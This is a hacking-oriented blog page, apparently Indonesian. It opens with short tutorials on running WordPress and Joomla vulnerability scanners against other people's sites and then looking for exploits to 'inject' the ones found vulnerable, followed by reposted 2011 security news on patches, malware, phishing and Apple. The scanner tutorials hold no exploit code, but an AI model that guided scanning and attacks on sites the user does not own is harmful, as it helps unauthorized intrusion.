[+] Wayc0de's Blog[+]


Tutorial Wordpress Scanning

Assalamu'alaikum dan salam sejahtera buat kita semua
ketemu agy ma ane yg newbie nie bangga
kali ini ane akan memberikan sedikit tutor mengenai Scanning Wordpress dan

tanpa banyak bacot langsung ke topic utamanya ea


1. Download software wordpress scanner disini wp-scan


-=- kita akan menjalankan wordpress scanner

setelah di download,, extract dulu file tersebut

buka terminal dan ketikkan command berikut ini :

cd Downloads
perl wp-scan.pl target.com
ex : perl wp-scan.pl www.webhostingiix.com

setelah proses scan selesai,,kalian bisa melihat hasilnya(proses nya ga nampak disana)
ntar ada report kalo udh finished, bisa dilihat hasilnya di sqli-bugs.txt di folder wp-scan tadi

selanjutnya kalian bisa melakukan penginjectkan terhadap target

silahkan tunggu sampai selesai dari proses scanning

nantinya disana akan tertera mana saja yang vuln

setelah selesai semuanya,,kita tinggal nyari exploitnya saudara-saudara ngakak

untuk nyari exploitnya bisa cari dimana saja ngakak

sekian dulu tutor cupu dari ane mewek

semoga bermanfaat buat kita semua belajar

akhir kata dari ane, wassalam bangga

nb : vba & ArRay

Tutorial Joomla Web Scanner 1.7

Assalamu'alaikum dan salam sejahtera buat kita semua seneng

sudah lama tidak update blog

oke langsung saja,,kali ini ane akan memberikan sedikit maenan buat tmen2 semua

sesuai dengan judulnya "Joomla Web Scanner 1.7"

dengan melihat judulnya saja,pasti temen-temen sudah pada ngerti tools ini buat apa


1. download dulu toolsnya Joomla-Scan

2. setelah di download mari kita extract file tersebut

3. kemudian kita akan menjalankan proses scanning target

pertama-tama kita lihat dulu command untuk tool ini

ketikkan = ./joomlascan/pl help

nantinya akan keluar seperti ini

[Image: joomla1.png]

Usage:  ./joomlascan.pl -u <joomla_url> [options]

    == Options ==
      -p <string:int>  = proxy:port
      -a               = Admin folder (default '/administration')
      -v               = Check version
      -c               = Check components
      -f               = Check firewall
      -co              = Check bugs in core (require -v)
      -cm              = Check bugs in components (require -c)
      -all             = Check all (default)
      -ot              = Output to text file
      -oh              = Output to html file
      -update          = Search for updates
      -force-update    = Force to download updates
      -about           = About joomlascan
      -version         = Print version info
      -h, -help        = This help

    == Examples ==
      To scan running joomla version and components:
         $./joomlascan.pl -u www.host.com -v -c

      To scan version and core bugs:
         $./joomlascan.pl -u www.host.com -v -co

4. saatnya beraksi dengan mengetik command berikut ini

./joomlascan.pl -u www.target.com -v -co

tunggu sampai selesai proses scanning,,ngerokok dulu mas bro ngakak

setelah selesai akan seperti ini hasilnya

mungkin segitu dulu tutor cupu dari ane

semoga bermanfaat bagi kita semua

akhir kata dari ane,,wassalam bangga


Apple's iOS 5.0.1 is out - should you upgrade?

Apple's latest iOS update is out.

The new version bumps iOS5 up to 5.0.1, and is Apple's first OTA update.

OTA stands for "over-the-air", and means that you can download and apply the update directly from your iDevice.
You no longer need to download the entire firmware file to your computer - including yet another copy of everything which hasn't changed in iOS - and push it to your device.
(OTA updating isn't yet mandatory. If you prefer to keep full copies of each iOS firmware distro, you can still use the download-and-install-with-iTunes method.)

According to Apple, the highlights of the 5.0.1 update are that it:
* fixes bugs affecting battery life,
* adds Multitasking Gestures for the original iPad,
* resolves bugs with Documents in the Cloud, and
* improves voice recognition for Australian users using dictation.

Strewth! That last one's a bonzer boost for blokes and sheilas everywhere! Gives an Aussie something worth lifting a tinnie to after the Baggy Green got such a big hiding from the South Africans in the cricket!

Importantly, 5.0.1 also fixes a number of security flaws, including a remote code execution (RCE) vulnerability involving font handling, found by Erling Ellingsen of Facebook. RCE means that a cybercriminal might be able to trick your device into running software without asking you, even if you're just browsing the internet.

Interestingly, Charlie Miller's recent and controversial App Store hole has also been patched. Miller showed how to write an innocent-looking App which, once approved by Apple, could fetch and run unapproved software.

Miller was unceremoniously banned from the Apple Developer scene for at least a year; there's no word from Apple, however, on whether he'll be readmitted now the hole is fixed.

Jailbreakers will be pleased to note that devices suitable for running a jailbroken iOS5 - a list which sadly still excludes the iPhone 4GS and the iPad 2 - can happily run a jailbroken iOS5.0.1.

If you are a jailbreaker, however, note that there is not yet any way to go back to iOS5.0 once you've moved on to 5.0.1.
That means that you'll never be able to use Charlie Miller's code-signing vulnerability for jailbreaking purposes in the future, for example if an iPad 2 jailbreak appears which relies on it.

And that leaves us with one question: should you update?
Some reports suggest that 5.0.1 brings with it a raft of new problems, and that the update might not, after all, fix your battery issues.

But these complaints are still anecdotal and unscientific, so if you trust Apple and you're not into jailbreaking, I'd suggest updating to 5.0.1 as soon as you conveniently can.

Ellingsen's and Miller's vulnerabilities may not have made it to Apple's highlights list, but each of these bugs on its own can be considered sufficiently important to warrant a prompt update.

Free Android antivirus software is 'useless,' says testing firm

The malware scanners from minor players typically catch less than 10 percent of malicious software

Free Android antivirus software is 'useless,' says testing firm
Consumers and workers who install free Android antivirus scanners from relatively unknown developers are mostly wasting their time, an independent testing firm has found. "During our tests, we found out that the majority of free products are -- to make it short -- useless," says Andreas Marx, CEO of AV-Test. Of all the major mobile platforms, Android is at most risk for malware.

The German firm tested seven free antivirus applications for the Android platform and found that the best program detected only one-third of resident malware, and all others detected less than 6 percent. The best performer, Zoner Antivirus Free, detected 8 of 10 malicious programs during installation, while the other applications detected at most 1 of the 10 malicious programs, according to the firm's analysis (PDF).

The company tested Zrgiu's Antivirus Free, BluePoint Antivirus Free, GuardX Antivirus, Kinetoo Malware Scan, LabMSF Antivirus beta, Privateer Lite, and Zoner AntiVirus Free. Four of the free antivirus program did not detect any of the 172 resident malicious programs used as a test base; another detected only 2. The programs also had little success in detecting malware during installation, with three of the programs detecting no malware and three others detecting a single program. Zoner Antivirus Free was the only standout of the bunch, detecting 32 percent of resident malware and 80 percent of malware during installation.

The firm compared the results to antivirus offerings from established security firms F-Secure and Kaspersky, which detected more than 50 percent of resident malware and blocked all 10 malware samples during installation.

The company plans to widen the testing for its next report to include antivirus programs from commercial vendors as well.



Anonymous and LulzSec trawl Google Code search for security holes

Low Orbit Ion CannonExotically named hacking tools such as Low Orbit Ion Cannon and #RefRef have garnered plenty of headlines over the last few months but a new report suggests that the world's favourite search engine might be an equally important weapon in the arsenal of cyber-criminals and hacktivists.

The report explains how a simple search on Google Code is all that's needed to uncover a wealth of information that can be used to break into websites, cloud-based services and secure networks.

Google's Code Search is a tool that makes it easy for those with technical know-how to search the vast amount of computer code that is publicly available online.

Researchers from IT security consultancy Stach & Lui report that hacking groups such as Anonymous and LulzSec are using Google Code search for a number of nefarious activities.

With a few well-crafted searches they can uncover passwords for cloud services, configuration files for Virtual Private Networks and find code  that is vulnerable to common website hacking tactics such as SQL injection.

While the findings provide a much-needed wake up call to online businesses, admins and developers, they also offer a fascinating insight into the motivation of hacking collectives such as Anonymous and LulzSec.

According to Stach & Lui ‘Google Hacking’, as the technique is known, is believed to be Anonymous and LulzSec’s primary means of identifying potential targets.
Rather than being motivated by politics or injustice, hacking groups may simply be targeting organisations because Google Code search has turned up a vulnerability too tempting to ignore, making them less political action groups, more malicious 21st century Wombles.

So what can online businesses do to protect themselves from these online, evil Uncle Bulgarias?

The first line of defence is to make sure that developers are following established best practice and that executives are creating a culture where best practice is encouraged and supported. Including passwords in code has always been a bad idea and techniques to prevent and detect SQL injection vulnerabilities are well established.

Businesses should also prepare so that if they are successfully attacked after a data leak they don't lose their shirt. Data stored in the cloud can be rendered useless to attackers by the simple expedient of encrypting it.

Stach & Lui warn that in the businesses using cloud services should also take a close look at the small print; many cloud service providers state that they don't accept responsibility for leaks.

For more on this take a look at the Stach & Lui's Pulp Google Hacking presentation.


Adobe says goodbye to Flash for mobile platforms

Adobe product management team has sent a briefing to Adobe's partners describing the future direction of the development for multi-platform mobile application development tools.

From the security point of view, the biggest and the most welcome news is the announcement of the end of the development of Adobe Flash player for mobile platforms, except for critical security and bug fixes.

Unfortunately, even if the death of Flash for mobile platforms is imminent, Flash for desktop platforms is still very much alive. Adobe Flash vulnerabilities, together with Java virtual machine and Adobe Reader vulnerabilities, have been the most common causes for drive-by download malware infections.

It is yet uncertain what is the future of Flash on desktop, but let us hope that the widespread acceptance of HTML5 will drive Adobe in the right direction of killing Flash players on all remaining platforms.

The move comes after a pressure by iPhone and iPad users which have been frustrated by not being able to access websites built in Flash since Apple announced its decision to exclude Flash support from iOS based devices.
Was Steve Jobs right about Flash after all?

Adobe, Apple, Microsoft & Mozilla Issue Critical Patches

Adobe, Apple, Microsoft and Mozilla all released updates on Tuesday to fix critical security flaws in their products. Adobe issued a patch that corrects four vulnerabilities in Shockwave Player, while Redmond pushed updates to address four Windows flaws. Apple slipped out an update that mends at least 17 security holes in its version of Java, and Mozilla issued yet another major Firefox release, Firefox 8.

The only “critical” patch from Microsoft this month is a dangerous Windows flaw that could be triggered remotely to install malicious software just by sending the target system specially crafted packets of data. Microsoft says this vulnerability may be difficult to reliably exploit, but it should be patched immediately. Information on the other three flaws fixed this week is here. The fixes are available via Windows Updates for most supported versions of the operating system, including XP, Vista and Windows 7.

Adobe’s Shockwave update also fixes critical flaws, but users should check to see if they have this program installed before trying to update it. To test whether you have Shockwave installed, visit this page; if you see an animation, it’s time to update. If you see a prompt to install Shockwave, there is no need to install it. Mozilla Firefox users without Shockwave Player installed may still see “Shockwave Flash” listed in the “Plugins” directory of the browser; this merely indicates that the user has Adobe’s Flash Player installed.

The vulnerabilities fixed by this update exist in versions of Shockwave and earlier. The latest version, v., is available here.  As I noted earlier this year, I haven’t had Shockwave on my system for some time now and don’t seem to have missed it. I’m sure it has its uses, but to me Shockwave is just another Adobe program that requires constant care and feeding. What’s more, like Adobe’s Flash Player, Shockwave demands two separate installation procedures for IE and non-IE browsers.

Hat tip to the SANS Internet Storm Center for the heads up on the Java fix from Apple. This update, available via Software Update or Apple Downloads, essentially brings Snow Leopard and Lion up to date with the Oracle patches released last month in Java 6 Update 29 (Apple maintains its own version of Java).

If you use Mozilla Firefox or Thunderbird, you may have noticed that Mozilla is pushing out another major upgrade that includes critical fixes to these programs; both have now been updated to version 8. If you’re still running Firefox version 3.6.x, Mozilla has updated that to 3.6.24 (if anyone can help decipher Mozilla’s timeline for exactly how long it will continue to support this workhorse version of Firefox, please drop a line in the comments below). Perhaps I’m becoming a curmudgeon, but I’m growing weary of the incessant update prompts from Firefox. It seems that almost every time I start it up it’s asking to restart the browser or to remove plugins that no longer work with the latest version. I’ve been gradually transitioning more of my work over to Google Chrome, which seems faster and updates the browser and any installed plugins silently (and frequently patches oft-targeted plugins like Flash Player even before Adobe officially releases the update).

Apple Bans Security Researcher Charlie Miller For Exposing iOS Exploit

The latest wave in the infosec world is that Apple has banned the well known security researcher – Charlie Miller – from it’s developer program for exposing a new iOS exploit.

It’s not really the smartest move as I’m pretty sure anyone as smart as Charlie Miller still has plenty of options – use another person’s account, sign up another account with a different identity, hack the phone without the developer program access and so on..

Really it’s quite a harsh move from Apple and it’s not going to make them any friends in the security industry.

Apple has banned well-known security researcher Charlie Miller from its developer program, for creating an apparently benign iOS app that was actually designed to exploit a security flaw he had uncovered in the firmware.

Within hours of talking about the exploit with Forbes’ security reporter Andy Greenberg, who published the details, Miller received an email from Apple: “This letter serves as notice of termination of the iOS Developer Program License Agreement … between you and Apple. Effective immediately.”

Based on Greenberg’s follow-up story, Apple was clearly within its rights to do so. Miller created a proof-of-concept application to demonstrate the security flaw and how it could be exploited by malicious code. He then hid it inside an apparently legitimate stock ticker program, an action that, according to Apple, “violated the developer agreement that forbid[s] him to ‘hide, misrepresent or obscure’ any part of his app,” Greenberg wrote.

He quoted Miller, who works for security consultancy Acuvant, “I’m mad. I report bugs to them all the time. Being part of the developer program helps me do that. They’re hurting themselves, and making my life harder.”

In a way though, you have to agree that Miller did violate the very specific developer program agreement by hiding the PoC inside a legitimate application. That probably wasn’t his smartest idea, but then again it’s helping Apple and he’s not doing it in a malicious way to infect people – he’s doing it as a security researcher.

Apple should be more proactive on working with people like this, people who are actually fixing bugs in their products for free and improving the user experience.

It’s the way Apple operates though, secretive, exclusive, domineering etc. If you don’t do things their way, screw you.

Miller, a former National Security Agency staffer, is a well-known “white hat” hacker (he made Network World’s recent list of “Security All Stars”), with expertise in Apple’s Mac OS X and iOS platforms, including the Safari browser, and in Android. Miller “has found and reported dozens of bugs to Apple in the last few years,” Greenberg noted. Miller reported the latest one barely three weeks ago, and it was Greenberg’s public account of it yesterday, in advance of a planned public presentation by Miller next week, that got the researcher kicked out of the developer program.

The vulnerability is a fascinating exercise in information security sleuthing. Miller uncovered a flaw introduced in Apple’s restrictions on code signing on iOS devices. Code signing is a process by which only Apple-approved commands run in device memory, according to Greenberg’s account.

Miller began to suspect a flaw when Apple released iOS 4.3 in March. He realized that to boost the speed of the mobile Safari browser, Apple for the first time had allowed javascript code from a website to run at a deeper level in memory. This entailed creating a security exception, allowing the browser to run unapproved code. According to Greenberg’s story, Apple created other security restrictions to block untrusted websites from exploiting this exception, so that only the browser could make use of it.

Miller wasn’t the only one to notice that Apple had done something different with Safari in iOS 4.3, but many didn’t understand what was actually happening. Various news sites and bloggers claimed that Web apps running outside of Safari, and its new Nitro javascript engine, were slower. Some suggested that Apple was deliberately slowing them down to make Web apps less attractive than native ones.

The way in which Miller uncovered the flaw once again shows his technical brilliance – something which Apple really should be harnessing rather than turning away.

A lot of people noticed changes with iOS 4.3, but couldn’t actually figure out what was going on. Well that’s what we know in the public realm anyway, no doubt the bad guys had their eyes on it and were digging in with much more malicious exploits.

It basically seems like a way to bypass any kind of code validation by Apple and execute arbitrary code from an attack server – dangerous indeed.


Fresh Phish disguised as a PayPal Urgent Account Review Notification

No Phishing Creative Commons photo courtesy of alex_lee2001's Flickr photostreamWhile browsing the web this evening waiting for thotcon 0x3 general admission tickets to go on sale, my wife's spidey senses were tingling when she asked me, "Is this a scam?"

Turning towards her monitor I see she has an email open inside her webmail account. The email has a pretty good sense of urgency written into it that compels the reader to follow the instructions provided and protect their information.
PayPal phish
It begins:
"As of the 3rd of November 2011, our security system has blocked unusual charges to a credit card linked to your account."
And concludes:
"Sincerely, PayPal Account Review Team"
Unfortunately, the average person who does not read Naked Security might easily be duped of their PII (Personally Identifiable Information).

Phishing scams are nothing new. Hopefully, if people stopped falling for them, then perhaps the phishing scams might stop?
It really comes down to education and great protection (for when education fails).
Mal/Phish-A Sophos Anti-Virus detectionThe home use version of Sophos Endpoint Security and Control did a fantastic job of catching the attack as Mal/Phish-A.

The home use version is available to Sophos customer's employees. Check with your employer if the home use program is available at your organization before installing Sophos software willy nilly.

I spoke earlier in the week with a security professional who sent 500 spear phishing attacks internally to his colleagues. Of the 500 emails sent, 25 people responded by completing the form and surrendering their information.
While a 5% rate may seem small, he felt even 1% was too high. Education helped a lot, but not completely. Do you agree?
When read, this fresh phish posing as PayPal immediately puts the recipient into an emotional state that their account was compromised and their funds are in jeopardy which then clouds their judgement.

Since PayPal is a trusted name in the electronic payments industry, they of course have controls to prevent fraudulent transactions (but no one is perfect). This phish takes advantage of that trust by explaining that the breached account has been locked for your protection.

Attached HTML phish fileNow to regain access to your funds it's imperative to download the attachment and complete the form.

After downloading and opening the attachment it will open your web browser. As you can see, this web page looks very genuine and might lower your guard into believing it really came from PayPal.
PayPal phishing site

There are a few mistakes in this poorly executed phish which caused education to prevail over emotion.

The most basic one is that there isn't a PayPal email address associated with the inbox which received this phish.

Another one to point out is that the (From: "PayPal") is really not from PayPal.
The phisher used a domain name pp-redacted-.com which based on a whois look up doesn't have anything to do with PayPal. It belongs to an instrumentation company out of Massachusetts that happens to have similar initials as PayPal.
While my wife isn't a security professional or an expert with computers, her education to not trust every email in her inbox (beyond spam) triggered a gut feeling to think more clearly.

If it doesn't feel right, then it's not. Go with your gut!
Until next time, stay safe and secure online.

Apple Security Chief Reportedly Leaves Company

Apple’s vice president of global security has reportedly stepped down roughly two months after the surface of news reports that an iPhone prototype had gone missing for the second time in less than two years.

According to reports, John Theriault, who came to Apple from Pfizer and was a former FBI agent, has retired in the wake of controversy regarding the device's disappearance and the subsequent efforts to track it down. Apple did not return a request for comment.

Nevertheless, Theriault’s departure follows a public relations dustup that began when an Apple employee left the prototype at a bar in San Francisco. The company's attempts to find the device led it to 22-year-old Sergio Calderon, who has said members of Apple's security team showed up at his home in San Francisco with police to search for the phone. According to Calderon, he only let the Apple investigators in because he thought they were police. However, the San Francisco Police Department - which initially denied involvement - has said that while there were officers at the scene, the search itself was conducted by the Apple employees.

The device, believed to have been a prototype of an iPhone 4S, was not found during the search. A lawyer for Calderon has reportedly threatened a lawsuit against Apple.

The latest case of the missing prototype echoes the disappearance of an iPhone 4 prototype in 2010. In that incident, an Apple employee left the phone at a bar called Gourmet Haus Staudt in Redwood City, Calif. When the phone was discovered, it was sold to the tech blog Gizmodo, which dissected the device and published pictures. This ultimately led investigators to raid the home of a Gizmodo editor. Two men were charged with selling the phone to Gizmodo and were sentenced to probation earlier this year. No one from Gizmodo was charged.

In the aftermath of the most recent incident, Apple was found to have posted job listings for a “product security manager” who would be responsible for “overseeing the protection of, and managing risks to, Apple’s unreleased products and related intellectual property.”

Open 'Facebook killer' survives on cash donations

Diaspora, the social network that sells itself as a privacy-conscious alternative to Facebook, is relying on user donations instead of advertising to get it going.

And by contrast to its other competitor, Google+, Diaspora also allows pseudonyms. The decentralised service aims to address some of the multitude of privacy and content control issues that have dogged Facebook and, arguable to a lesser extent, Google+, while still giving users the ability share content and ideas with their friends online.

Users retain the copyright of uploaded photos and the like, which is only shared among groups that users actively define, not friends-of-friends or the whole network (often the default options on Facebook).

The service was launched in November 2010 and remains in alpha. However having signed up to try the invitation-only service months ago, El Reg finally received an invitation to try it on Thursday, so things appear to be moving (albeit slowly). The emailed invitation (extract below) was nothing if not enthusiastic:

Finally – it's here

The social network you have been waiting for has arrived. Revamped, more secure, and more fun, DIASPORA* is ready to help you share and explore the web in a whole new way.

Sign up now

Last month the developers behind the software – students at New York University's Courant Institute of Mathematical Sciences – began soliciting donations via PayPal. Diaspora's account was frozen for a short while by the eBay-owned payments biz, without explanation, but has since been restored. The site added other donation methods, including BitCoins, following the episode.

Once signed up to Diaspora, users are immediately invited to link their Diaspora and Facebook accounts to "speed things up a bit" and "enable cross-posting".

This may help populate a profile, but we can't help thinking that linking to Facebook creates privacy concerns all by itself and runs against Diaspora's aims to make "privacy controls both clear and straightforward". You can also add links between Diaspora and Twitter accounts or import contacts from email accounts into Diaspora.

Users are invited to use #hashtags to classify posts and find people who share their interests. They are presented with a "stream" populated with all of their contacts, tags they follow, and "posts from some creative members of the community" who have apparently chosen to share comments, video clips and pictures with everyone on the network. Contents are arranged in "aspects" – friends, family, work colleagues etc – on the site.

There's a lot of help for newbies as well as the facility to ask questions. The interface is clean and well-designed, perhaps partly because there's only one application on offer, Cubbi.es, which offers a way to collate photos. There's also a messaging feature. Overall the web interface is much closer in look and feel to Twitter than Facebook.

The site is useable but still a work in progress, as its alpha designation implies. Upcoming features promised include an ability for users to export their data and to create communities.

Diaspora is based on open-source technology. Early versions of its code were riddled with all manner of security holes, so cautious progress towards a full launch - adopting the open-source ethos of quickly fixing bugs as and when they arise - may be just as well.

There's also the capacity management issues to think about: after all, it's a site run on a modest budget, partially helped by T-shirt sales, and running as a not-for-profit concern.


Anonymous abandons plan to expose Mexican drug cartel collaborators

Hacker group backs away from exposing people it believes are connected to Zetas cartel after alleged threat of killings

A plan by the international hacker movement Anonymous to expose collaborators of Mexico's notorious Zetas drugs cartel has come to an abrupt end. A US activist backed away from publishing the names after an alleged counter-threat of mass retaliatory killings.

"This moves the operation from being a risk to knowing that I would be murdering people," Anonymous participant Barrett Brown told the Guardian on Friday.

Brown's withdrawal from Operation Cartel puts an end to one of the most bizarre and confusing episodes in Mexico's drug wars.

It began with a video which appeared online in early October and promised to reveal the identities of people working with the Zetas unless the cartel released an Anonymous member kidnapped in the Mexican city of Veracruz.

The video prompted furious online debate: while Anonymous has previously targeted business and government websites and databases around the world, it was unclear how it could confront Mexico's amorphous – and deadly – drug trafficking organisations. Conflicting messages appeared on Twitter and other social networking sites, with some activists saying the operation had been cancelled while others pledged to continue.

This culminated in Mexico on Thursday when Spanish-speaking Anonymous participants, who had previously pledged to continue, announced that the Zetas had let the kidnapped member go.

They also said that she carried with her a message from the cartel threatening to kill 10 people for every person named and that they had decided to abandon their plans.

Brown, a prominent Texas-based activist and one of the few willing to be named, initially said Mexican hackers had promised to give him information on Zeta collaborators that they had taken from Mexican government sites and that it would be released in the next few days.

But while he said he was comfortable with running personal risks and "passing a death sentence" on those he identified, the wider retaliation threat had made him "rethink my position".

He added that Anonymous would continue to explore ways of using the internet to help spark some kind of mass response to "the near collapse" in Mexico, as he claims it did in Tunisia and Egypt.

New Mac Malware Variants Found in Trojaned Apps Are Stealing Data

Mac trojanResearchers have discovered a series of variants of the DevilRobber Mac OS X Trojan that have a menu of different capabilities, depending upon the strain, and can not only mine Bitcoins using the infected machine's processing power, but also steals files, installs a Web proxy and may steal the user's Safari browsing history.

The new variants of DevilRobber, which has been making the rounds recently, appear to each have a different set of capabilities because they may have each been built for specific jobs, according to an analysis of the malware by researchers at F-Secure. Some of the variants appear to be looking for specific pornographic files on infected Macs and steals passwords from the machine in order to access any files that may be protected. All of the variants of DevilRobber have the ability to take data from the machine and upload it to a remote server.
The new variants were discovered in legitimate Mac applications that had been Trojaned and then shared on Pirate Bay.

"The specific port used by the web proxy depends on the variant. The specific FTP server for data stealing also varies between samples. And DevilRobber's data stealing routine is repeated on a fixed interval — every 43200, 60000, or 100000 seconds, depending on the sample," F-Secure says in its analysis.

Mac malware has been making some headlines in the last few months, as attackers have begun applying to OS X some of the tactics they've been using on Windows for decades. In September, a Trojan called Imuler was found packed inside malicious PDFs, a trick that attackers have been using to get their malware into the hands of users for years now. And earlier in the year the MacDefender malware made a big splash as the first Mac-specific rogue antivirus program to emerge.

Apple is beginning to take some steps to address the threats facing its users, including the announcement this week that all apps submitted to the Mac App Store will have to have a sandbox by March 2012.


Zero-Day Exploit Used for DUQU

We have been closely monitoring developments on the DUQU malware since our initial blog post when the threat broke the news. And just recently, the Hungary-based security laboratory that initially reported about DUQU released more information that sheds more light into the nature of the said threat.

Their report indicates that a Microsoft Word document that triggers a zero-day kernel exploit was identified as the dropper for DUQU. Upon successful exploitation, the Microsoft Word file drops the installer files that load the DUQU components that were initially reported a couple of weeks back.

The installer files are composed of a .SYS file detected as RTKT_DUQU.B, and a .DLL file detected as TROJ_DUQU.B. RTKT_DUQU.B loads TROJ_DUQU.B into the system. TROJ_DUQU.B, on the other hand, drops and decrypts the DUQU components, RTKT_DUQU.A, TROJ_DUQU.ENC, and TROJ_DUQU.CFG. Below is a simple behavior diagram of the threat.

Details regarding the zero-day exploit used have not yet been disclosed. However, Microsoft is expected to release information on it soon. As a member of the Microsoft Active Protections Program (MAPP), if Microsoft provides information on ways we can protect customers while a security patch is being developed, we will add these protections to our products as quickly as possible and update you with that information.

This new information allows us to have more educated theories of how the DUQU attack took place. Considering the usage of a Microsoft Word document, it is likely that this was initially deployed through email messages sent to employees in the targeted organization.This further verifies our earlier hypothesis that DUQU is part of a highly targeted attack aimed at exfiltrating information from targeted entities. For more information on DUQU and the nature of highly targeted attacks, please check the following reports:
We have created the proactive detections of TROJ_DUQUCFG.SME and RTKT_DUQU.SME to address future variants of DUQU component files. Also, the Threat Discovery Appliance (TDA) protects enterprise networks by detecting network activity and the malwares’ connection to the C&C server through the rules 473 TCP_MALICIOUS_IP_CONN, 528 HTTP_Request_DUQU, and 529 HTTP_Request_DUQU2.

Update as of November 3, 2011, 8:30 PM PST

Microsoft released a security advisory regarding the vulnerability used by DUQU.
The vulnerability exists in the Win32k TrueType font parsing engine and allows elevation of privilege. According to the advisory, a successful exploitation can allow an attacker to run arbitrary code in kernel mode.
We are currently collecting more information about this, and will update this blog entry with our findings as soon as possible. Read More...

Rec Studio 4 – Reverse Engineering Compiler & Decompiler

REC Studio is an interactive decompiler. It reads a Windows, Linux, Mac OS X or raw executable file, and attempts to produce a C-like representation of the code and data used to build the executable file. It has been designed to read files produced for many different targets, and it has been compiled on several host systems.

REC Studio 4 is a complete rewrite of the original REC decompiler. It uses more powerful analysis techniques such as partial Single Static Assignment (SSA), allows loading Mac OS X files and supports 32 and 64 bit binaries.

Although still under development, it has reached a stage that makes it more useful than the old Rec Studio 2.


Multihost: Rec Studio runs on Windows XP/Vista/7, Ubuntu Linux, Mac OS X.
Symbolic information support using Dwarf 2 and partial recognition of Microsoft’s PDB format.
C++ is partially recognized: mangled names generated by gcc are demangled, as well as inheritance described in dwarf2 is honored. However, C++ is a very broad and difficult language, so some features like templates won’t likely be ever supported.
Types and function prototype definitions can be specified in text files. Some standard Posix and Windows APIs are already provided in the Rec Studio package.
Interactivity is supported, limited to definition of sections, labels and function entry points. Will need to improve it to support in-program definition of types and function parameters.

Although REC can read Win32 executable (aka PE) files produced by Visual C++ or Visual Basic 5, there are limitations on the output produced. REC will try to use whatever information is present in the .EXE symbol table. If the .EXE file was compiled without debugging information, if a program data base file (.PDB) or Codeview (C7) format was used, or if the optimization option of the compiler was enabled, the output produced will not be very good. Moreover, Visual Basic 5 executable files are a mix of Subroutine code and Form data. It is almost impossible for REC to determine which is which. The only option is to use a .cmd file and manually specify which area is code and which area is data.

You can download Rec Studio 4 here:

Windows –
Ubuntu –
Mac –

Or read more .